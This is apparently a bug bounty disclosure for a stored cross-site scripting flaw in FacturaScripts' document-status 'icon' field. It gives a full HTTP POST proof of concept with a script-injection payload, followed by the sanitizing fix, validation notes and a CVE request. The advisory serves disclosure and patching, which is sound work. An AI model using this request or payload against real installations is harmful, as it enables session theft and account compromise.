Stored XSS in EditEstadoDocumento in neorazorx/facturascripts

Valid

Reported on

Jun 21st 2022


Description

In facturascripts/EditEstadoDocumento, the field Icon can be injected an XSS payload into it.

Proof of Concept

// PoC.js
POST /facturascripts/EditEstadoDocumento?code=27&action=save-ok HTTP/1.1
Host: 127.0.0.1
Content-Length: 1224
Cache-Control: max-age=0
sec-ch-ua: "-Not.A/Brand";v="8", "Chromium";v="102"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryyI8BCGNBzwLmaAy8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/facturascripts/EditEstadoDocumento?code=26&action=save-ok
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: fsNick=admin; fsLogkey=hMNEoHuTcDfqZY9OK5b8tG7SW4pUliLFrQkdaBxjCzmJR6gXPnAse2I0Vwy13v; fsLang=en_EN; fsCompany=1; MANTIS_STRING_COOKIE=074c946191216c6d308b8d38e9569cfdef504077558ca4e138964772efb3b87f; MANTIS_PROJECT_COOKIE=0; ucp_tabs=2; __stripe_mid=31234598-f1c7-427c-b5cd-9312a98b0b98b9519b; cookie_token=1c39db291b76e38db9e55ed6f02a77b65ae952140787ee0282a0f7880a7935ca; cpg16x_data=YTo2OntzOjI6IklEIjtzOjMyOiI0MmNlNzEwM2M5OTM5NDNjYTIwMDM2YmRkYmM2NTMxOSI7czoyOiJhbSI7aTowO3M6NDoibGFuZyI7czoxMDoiY2hpbmVzZV9nYiI7czo2OiJzZWFyY2giO2E6Mjp7czo2OiJwYXJhbXMiO2E6Njp7czo4OiJrZXl3b3JkcyI7czoyOiJvbiI7czo1OiJ0aXRsZSI7czoyOiJvbiI7czo3OiJjYXB0aW9uIjtzOjI6Im9uIjtzOjQ6InR5cGUiO3M6MzoiQU5EIjtzOjEwOiJuZXdlcl90aGFuIjtzOjA6IiI7czoxMDoib2xkZXJfdGhhbiI7czowOiIiO31zOjY6InNlYXJjaCI7czozOiJzdmciO31zOjM6ImxpdiI7YToxOntpOjA7czoyOiI4NSI7fXM6MTM6InVwbG9hZF9tZXRob2QiO3M6MTA6InVwbG9hZF9zZ2wiO30%3D; elggperm=zG9jJWU92GZ03ft0yoDFuZ0zhBSb9YvA; Elgg=eftlmmmmdr4oamet41e1le100e
Connection: close

------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="action"

insert
------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="activetab"

EditEstadoDocumento
------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="code"


------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="multireqtoken"

5ebd6335e1917c1e3191a32f6b4be8fd9a5d8c71|1VDJp6
------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="idestado"


------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="nombre"

33
------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="tipodoc"

PresupuestoCliente
------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="actualizastock"

33
------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="generadoc"


------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="icon"

'"><script>alert(/xss/);</script><'"2
------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="editable"

TRUE
------WebKitFormBoundaryyI8BCGNBzwLmaAy8--

Impact

This vulnerability has the potential to deface websites, result in compromised user accounts, and can run malicious code on web pages, which can lead to a compromise of the user’s device.

Occurrences

$this->icon = $this->toolBox()->utils()->noHtml($this->icon);

We are processing your report and will contact the neorazorx/facturascripts team within 24 hours. 5 days ago
Carlos Garcia validated this vulnerability 5 days ago
i0hex has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Carlos Garcia confirmed that a fix has been merged on 6b03dc 5 days ago
The fix bounty has been dropped
EstadoDocumento.php#L141 has been validated
i0hex
2 days ago

Researcher


@admin Hey, may I have a CVE?

Jamie Slome
2 days ago

Admin


@iohehe - we can proceed with a CVE if the maintainer is happy to do so :)

to join this conversation